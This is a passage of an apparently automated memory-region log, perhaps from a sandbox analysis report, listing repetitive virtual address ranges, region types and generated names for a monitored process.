"" Region: id = 13713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13715 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13716 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13717 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13718 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13719 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13720 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13721 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13722 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13723 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13724 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13726 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13727 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13728 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13729 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13730 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13731 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13732 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13733 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13735 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13736 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13737 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13738 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13739 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13740 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13743 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13744 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13745 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13746 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13747 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13748 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13749 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13750 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13751 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13752 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13754 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13755 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13756 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13757 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13758 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13759 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13760 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13761 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13762 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13763 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13764 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13766 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13767 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13768 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13769 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13771 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13772 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13773 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13774 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13775 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13776 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13777 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13778 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13779 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13780 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13782 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13783 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13784 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13785 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13786 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13787 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13788 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13789 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13790 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13791 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13792 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13793 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13794 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13795 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13796 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13798 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13799 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13800 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13801 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13802 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13803 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13804 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13805 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13806 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13807 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13808 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13809 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13810 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13811 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 13812 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13813 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13814 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13815 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13816 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13817 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13818 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13819 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13820 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13821 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13822 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13824 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13825 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13826 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13827 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13828 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13829 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13830 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13831 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13832 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13833 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13834 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13835 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13837 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13838 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13839 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13840 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13841 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13842 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13843 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13844 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13845 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13848 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13849 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13850 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13851 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13852 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13853 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13854 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13855 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13857 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13861 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13865 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13868 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13869 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13871 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13873 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13875 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13877 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13879 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13881 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13885 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13889 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13893 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13897 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13901 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13902 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13905 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13906 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13909 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13910 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13911 start_va = 0x580000 end_va = 